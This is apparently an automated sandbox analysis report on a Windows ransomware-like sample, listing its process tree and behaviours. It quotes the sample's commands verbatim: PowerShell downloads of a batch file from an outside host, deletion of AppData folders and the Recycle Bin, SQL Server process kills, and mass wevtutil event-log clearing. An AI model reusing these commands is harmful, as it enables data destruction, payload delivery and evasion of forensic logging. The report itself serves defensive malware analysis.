Token: SeSecurityPrivilege	1812	wevtutil.exe
Token: SeBackupPrivilege	1812	wevtutil.exe
Token: SeSecurityPrivilege	2016	wevtutil.exe
Token: SeBackupPrivilege	2016	wevtutil.exe
Token: SeSecurityPrivilege	1472	wevtutil.exe
Token: SeBackupPrivilege	1472	wevtutil.exe
Token: SeSecurityPrivilege	1476	wevtutil.exe
Token: SeBackupPrivilege	1476	wevtutil.exe
Token: SeSecurityPrivilege	1544	wevtutil.exe
Token: SeBackupPrivilege	1544	wevtutil.exe
Token: SeSecurityPrivilege	1496	wevtutil.exe
Token: SeBackupPrivilege	1496	wevtutil.exe
Token: SeSecurityPrivilege	1400	wevtutil.exe
Token: SeBackupPrivilege	1400	wevtutil.exe
Token: SeSecurityPrivilege	608	wevtutil.exe
Token: SeBackupPrivilege	608	wevtutil.exe
Token: SeSecurityPrivilege	1252	wevtutil.exe
Token: SeBackupPrivilege	1252	wevtutil.exe
Token: SeSecurityPrivilege	532	wevtutil.exe
Token: SeBackupPrivilege	532	wevtutil.exe
Token: SeSecurityPrivilege	548	wevtutil.exe
Token: SeBackupPrivilege	548	wevtutil.exe
Token: SeSecurityPrivilege	316	wevtutil.exe
Token: SeBackupPrivilege	316	wevtutil.exe
Token: SeSecurityPrivilege	2044	wevtutil.exe
Token: SeBackupPrivilege	2044	wevtutil.exe
Token: SeSecurityPrivilege	704	wevtutil.exe
Token: SeBackupPrivilege	704	wevtutil.exe
Token: SeSecurityPrivilege	1408	wevtutil.exe
Token: SeBackupPrivilege	1408	wevtutil.exe
Token: SeSecurityPrivilege	676	wevtutil.exe
Token: SeBackupPrivilege	676	wevtutil.exe
Token: SeSecurityPrivilege	1792	wevtutil.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

NOTEPAD.EXEiexplore.exe

pid process

1900 NOTEPAD.EXE
1356 iexplore.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1356 iexplore.exe
1356 iexplore.exe
676 IEXPLORE.EXE
676 IEXPLORE.EXE
676 IEXPLORE.EXE
676 IEXPLORE.EXE
676 IEXPLORE.EXE

pid	process
1900	NOTEPAD.EXE
1356	iexplore.exe

pid	process
1356	iexplore.exe
1356	iexplore.exe
676	IEXPLORE.EXE
676	IEXPLORE.EXE
676	IEXPLORE.EXE
676	IEXPLORE.EXE
676	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exenet.execmd.exe

description	pid	process	target process
PID 1516 wrote to memory of 1908	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1908	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1908	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1908 wrote to memory of 1932	1908	cmd.exe	label.exe
PID 1908 wrote to memory of 1932	1908	cmd.exe	label.exe
PID 1908 wrote to memory of 1932	1908	cmd.exe	label.exe
PID 1516 wrote to memory of 1972	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1972	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1972	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1972 wrote to memory of 1832	1972	cmd.exe	reg.exe
PID 1972 wrote to memory of 1832	1972	cmd.exe	reg.exe
PID 1972 wrote to memory of 1832	1972	cmd.exe	reg.exe
PID 1516 wrote to memory of 1820	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1820	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1820	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1820 wrote to memory of 1860	1820	cmd.exe	taskkill.exe
PID 1820 wrote to memory of 1860	1820	cmd.exe	taskkill.exe
PID 1820 wrote to memory of 1860	1820	cmd.exe	taskkill.exe
PID 1516 wrote to memory of 1028	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1028	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1028	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1028 wrote to memory of 316	1028	cmd.exe	taskkill.exe
PID 1028 wrote to memory of 316	1028	cmd.exe	taskkill.exe
PID 1028 wrote to memory of 316	1028	cmd.exe	taskkill.exe
PID 1516 wrote to memory of 1448	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1448	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1448	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1448 wrote to memory of 1280	1448	cmd.exe	taskkill.exe
PID 1448 wrote to memory of 1280	1448	cmd.exe	taskkill.exe
PID 1448 wrote to memory of 1280	1448	cmd.exe	taskkill.exe
PID 1516 wrote to memory of 704	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 704	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 704	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 616	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 616	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 616	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 296	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 296	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 296	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 544	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 544	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 544	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 544 wrote to memory of 596	544	cmd.exe	attrib.exe
PID 544 wrote to memory of 596	544	cmd.exe	attrib.exe
PID 544 wrote to memory of 596	544	cmd.exe	attrib.exe
PID 1516 wrote to memory of 924	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 924	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 924	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 924 wrote to memory of 876	924	cmd.exe	net.exe
PID 924 wrote to memory of 876	924	cmd.exe	net.exe
PID 924 wrote to memory of 876	924	cmd.exe	net.exe
PID 876 wrote to memory of 1416	876	net.exe	net1.exe
PID 876 wrote to memory of 1416	876	net.exe	net1.exe
PID 876 wrote to memory of 1416	876	net.exe	net1.exe
PID 1516 wrote to memory of 1784	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1784	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1784	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1592	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1592	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1516 wrote to memory of 1592	1516	35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe	cmd.exe
PID 1592 wrote to memory of 1496	1592	cmd.exe	powershell.exe
PID 1592 wrote to memory of 1496	1592	cmd.exe	powershell.exe
PID 1592 wrote to memory of 1496	1592	cmd.exe	powershell.exe
PID 1592 wrote to memory of 1496	1592	cmd.exe	powershell.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

596 attrib.exe

pid	process
596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe
"C:\Users\Admin\AppData\Local\Temp\35e8e113150b041416abda4a8d8952ab9dc4ce86f184847220ef0e964e0916fd.exe"
1⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1516

C:\Windows\system32\cmd.exe
cmd /C "label C: Encrypted"
2⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\label.exe
label C: Encrypted
3⤵
PID:1932

C:\Windows\system32\cmd.exe
cmd /C "reg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d %SystemRoot%\System32\SHELL32.dll,271 /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\reg.exe
reg add HKEY_CLASSES_ROOT\.secure\DefaultIcon /t REG_SZ /d C:\Windows\System32\SHELL32.dll,271 /f
3⤵
- Modifies registry class
PID:1832

C:\Windows\system32\cmd.exe
cmd /C "taskkill /F /IM sqlservr.exe /T"
2⤵
- Suspicious use of WriteProcessMemory
PID:1820

C:\Windows\system32\taskkill.exe
taskkill /F /IM sqlservr.exe /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860

C:\Windows\system32\cmd.exe
cmd /C "taskkill /F /IM sqlceip.exe /T"
2⤵
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\system32\taskkill.exe
taskkill /F /IM sqlceip.exe /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\system32\cmd.exe
cmd /C "taskkill /F /IM sqlwriter.exe /T"
2⤵
- Suspicious use of WriteProcessMemory
PID:1448

C:\Windows\system32\taskkill.exe
taskkill /F /IM sqlwriter.exe /T
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Windows\system32\cmd.exe
cmd /C "rmdir C:\Users\Admin\AppData /s /q"
2⤵
PID:704

C:\Windows\system32\cmd.exe
cmd /C "rmdir C:\Users\Default\AppData /s /q"
2⤵
PID:616

C:\Windows\system32\cmd.exe
cmd /C "rmdir C:\Users\Public\AppData /s /q"
2⤵
PID:296

C:\Windows\system32\cmd.exe
cmd /C "attrib +h +s Crypto.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\system32\attrib.exe
attrib +h +s Crypto.exe
3⤵
- Views/modifies file attributes
PID:596

C:\Windows\system32\cmd.exe
cmd /C "net stop MSSQL$SQLEXPRESS"
2⤵
- Suspicious use of WriteProcessMemory
PID:924

C:\Windows\system32\net.exe
net stop MSSQL$SQLEXPRESS
3⤵
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS
4⤵
PID:1416

C:\Windows\system32\cmd.exe
cmd /C "rmdir C:\$Recycle.Bin /s /q"
2⤵
PID:1784

C:\Windows\system32\cmd.exe
cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')"
2⤵
- Suspicious use of WriteProcessMemory
PID:1592

C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/clear.txt', 'C:\Users\Public\Music\clear.bat')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\cmd.exe
cmd /C "C:\windows\syswow64\windowspowershell\v1.0\powershell(New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')"
2⤵
PID:1424

C:\windows\syswow64\windowspowershell\v1.0\powershell.exe
C:\windows\syswow64\windowspowershell\v1.0\powershell (New-Object System.Net.WebClient).DownloadFile('http://e-service.iag.bg/App_Themes/Efa/video.mp4', 'C:\Users\Public\Music\video.mp4')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Windows\system32\cmd.exe
cmd /C C:\Users\Public\Music\clear.bat
2⤵
PID:616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit
3⤵
PID:2012

C:\Windows\system32\bcdedit.exe
bcdedit
4⤵
PID:596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
3⤵
PID:2036

C:\Windows\system32\wevtutil.exe
wevtutil.exe el
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Application"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DebugChannel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "DirectShowPluginControl"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Internet Explorer"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Key Management Service"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Media Center"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationDeviceProxy"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "MediaFoundationPlatform"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IE/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
3⤵
PID:1468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
3⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
3⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
3⤵
PID:1792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
3⤵
PID:876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
3⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
3⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
3⤵
PID:1784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
3⤵
PID:1468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
3⤵
PID:1212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
3⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
3⤵
PID:1988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
3⤵
PID:1992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
3⤵
PID:908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
3⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
3⤵
PID:608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
3⤵
PID:1252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
3⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
3⤵
PID:548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
3⤵
PID:316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
3⤵
PID:2044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
3⤵
PID:1404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
3⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
3⤵
PID:676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
3⤵
PID:924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
3⤵
PID:748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
3⤵
PID:1900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
3⤵
PID:1512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
3⤵
PID:112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
3⤵
PID:1828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
3⤵
PID:1972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
3⤵
PID:1136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"
3⤵
PID:904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"
3⤵
PID:948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
3⤵
PID:1580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
3⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
3⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
3⤵
PID:2016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
3⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
3⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
3⤵
PID:1544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
3⤵
PID:1400

C:\Windows\system32\wevtutil.exe
